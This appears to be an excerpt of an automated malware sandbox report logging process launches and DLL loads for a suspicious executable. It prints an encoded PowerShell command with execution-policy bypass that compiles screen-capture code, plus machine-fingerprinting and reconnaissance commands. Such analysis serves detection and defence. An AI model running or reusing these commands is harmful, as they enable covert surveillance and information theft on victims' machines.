                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6BB9.tmp" "c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: python311.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: libffi-8.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: sqlite3.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: python3.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: libcrypto-1_1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: libssl-1_1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\query.exeSection loaded: regapi.dllJump to behavior
                      Source: C:\Windows\System32\quser.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\quser.exeSection loaded: utildll.dllJump to behavior
                      Source: C:\Windows\System32\quser.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\quser.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\System32\net1.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
